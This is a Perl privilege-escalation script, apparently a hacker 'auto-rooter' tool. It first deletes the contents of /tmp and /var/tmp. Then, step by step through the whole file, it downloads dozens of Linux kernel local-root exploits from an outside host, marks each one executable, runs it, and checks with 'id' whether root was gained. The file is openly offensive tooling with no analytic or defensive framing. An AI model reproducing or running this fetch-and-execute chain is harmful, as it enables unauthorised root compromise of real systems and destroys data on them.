#!/usr/bin/perl 

#http://kabooos.persiangig.com/r0t/r0t.pl
#
# B1M0KH
{ 
system("rm -rf /tmp/*");
system("rm -rf /var/tmp/*");
system("wget http://kabooos.persiangig.com/r0t/audit");
system("chmod 777 audit"); 
system("./audit"); 
system("id");
system("./audit"); 
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/1");
system("chmod 777 1"); 
system("./1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget 1-2 http://kabooos.persiangig.com/r0t/1-2");
system("chmod 777 1-2"); 
system("./1-2"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget 1-3 http://kabooos.persiangig.com/r0t/1-3");
system("chmod 777 1-3"); 
system("./1-3"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/1-4");
system("chmod 777 1-4"); 
system("./1-4"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
system("wget http://kabooos.persiangig.com/r0t/2");
system("chmod 777 2"); 
system("./2"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget 2-1 http://kabooos.persiangig.com/r0t/2-1");
system("chmod 777 2-1"); 
system("./2-1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/3");
system("chmod 777 3"); 
system("./3"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/4");
system("chmod 777 4"); 
system("./4"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/5");
system("chmod 777 5"); 
system("./5"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/6");
system("chmod 777 6"); 
system("./6"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/7");
system("chmod 777 7"); 
system("./7"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/8");
system("chmod 777 8"); 
system("./8"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/9");
system("chmod 777 9"); 
system("./9"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/10");
system("chmod 777 10"); 
system("./10"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/11");
system("chmod 777 11"); 
system("./11"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/13.py");
system("chmod 777 13.py"); 
system("python 13.py"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/14");
system("chmod 777 14"); 
system("./14"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/15.sh");
system("chmod 777 15.sh"); 
system("./15.sh"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/16");
system("chmod 777 16"); 
system("./16"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/16-1");
system("chmod 777 16-1"); 
system("./16-1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/bru1.tar.gz");
system("tar xzf bru1.tar.gz");
sleep(1);
system("chmod 777 run"); 
system("./run"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/bru2.tar.gz");
system("tar xzf bru2.tar.gz");
sleep(1);
system("chmod 777 run"); 
system("./run"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/bru3.tar.gz");
system("tar xzf bru3.tar.gz");
sleep(1);
system("chmod 777 run.sh"); 
system("./run.sh"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/exploit");
system("chmod 777 exploit"); 
system("./exploit"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/pwnkernel");
system("chmod 777 pwnkernel"); 
system("chmod 777 pwnkernel"); 
system("./pwnkernel"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/bru.tar.gz");
system("tar xzf bru.tar.gz");
sleep(1);
system("sed -i '/turn_\(on\|off\)_wp();/d' exploit.c"); 
system("sh run_null_exploits.sh");
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget 44 http://kabooos.persiangig.com/r0t/44");
system("chmod 777 44"); 
system("./44"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/7x");
system("chmod 777 7x"); 
system("./7x"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/7-2");
system("chmod 777 7-2"); 
system("./7-2"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/exp1");
system("chmod 777 exp1"); 
system("./exp1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/exp2");
system("chmod 777 exp2"); 
system("./exp2"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/exp3");
system("chmod 777 exp3"); 
system("./exp3"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/runx");
system("chmod 777 runx"); 
system("./runx"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/root1");
system("chmod 777 root1"); 
system("./root1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/rot");
system("chmod 777 rot"); 
system("./rot"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/36-rc1");
system("chmod 777 36-rc1"); 
system("./36-rc1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/18");
system("chmod 777 18"); 
system("./18"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/15150");
system("chmod 777 15150"); 
system("./15150"); 
system("./15150 0xc0102290 64"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/31");
system("chmod 777 31"); 
system("./31"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/ubuntu");
system("chmod 777 ubuntu"); 
system("./ubuntu"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/lenis.sh");
system("chmod 777 lenis.sh"); 
system("./lenis.sh"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/gayros");
system("chmod 777 gayros"); 
system("./gayros"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/full-nelson");
system("chmod 777 full-nelson"); 
system("./full-nelson"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2-6-37");
system("chmod 777 2-6-37"); 
system("./2-6-37"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/tivoli");
system("chmod 777 tivoli"); 
system("./tivoli"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/13x");
system("chmod 777 13x"); 
system("./13x"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/15200");
system("chmod 777 15200"); 
system("./15200"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/american-sign-language");
system("chmod 777 american-sign-language"); 
system("./american-sign-language"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/z1d-2011");
system("chmod 777 z1d-2011"); 
system("./z1d-2011"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/18-5");
system("chmod 777 18-5"); 
system("./18-5"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-164-2010");
system("chmod 777 2.6.18-164-2010"); 
system("./2.6.18-164-2010"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-194.1-2010");
system("chmod 777 2.6.18-194.1-2010"); 
system("./2.6.18-194.1-2010"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-194.2-2010");
system("chmod 777 2.6.18-194.2-2010"); 
system("./2.6.18-194.2-2010"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.37");
system("chmod 777 2.6.37"); 
system("./2.6.37"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.37-rc2");
system("chmod 777 2.6.37-rc2"); 
system("./2.6.37-rc2"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.33");
system("chmod 777 2.6.33"); 
system("./2.6.33"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1"); 
system("./2.6.34-2011Exploit1"); 
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-194");
system("chmod 777 2.6.18-194"); 
system("./2.6.18-194"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-274-2011");
system("chmod 777 2.6.18-274-2011"); 
system("./2.6.18-274-2011"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.33-2011");
system("chmod 777 2.6.33-2011"); 
system("./2.6.33-2011"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-6-x86-2011");
system("chmod 777 2.6.18-6-x86-2011"); 
system("./2.6.18-6-x86-2011"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.28-2011");
system("chmod 777 2.6.28-2011"); 
system("./2.6.28-2011"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1"); 
system("./2.6.34-2011Exploit1"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.34-2011Exploit2");
system("chmod 777 2.6.34-2011Exploit2"); 
system("./2.6.34-2011Exploit2"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/local-root-exploit-gayros");
system("chmod 777 local-root-exploit-gayros"); 
system("./local-root-exploit-gayros"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/vmsplice-local-root-exploit");
system("chmod 777 vmsplice-local-root-exploit"); 
system("./vmsplice-local-root-exploit"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2-6-32-46-2011");
system("chmod 777 2-6-32-46-2011"); 
system("./2-6-32-46-2011"); 
system("id");
print "If u r r0t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.18-374.12.1.el5-2012");
system("chmod 777 2.6.18-374.12.1.el5-2012"); 
system("./2.6.18-374.12.1.el5-2012"); 
system("id");
sleep 5;
system("wget http://kabooos.persiangig.com/r0t/2.6.39-2012");
system("chmod 777 2.6.39-2012"); 
system("./2.6.39-2012"); 
system("id");
print "\n\n--- edit by k4bo0os  ---\n\n";
} 
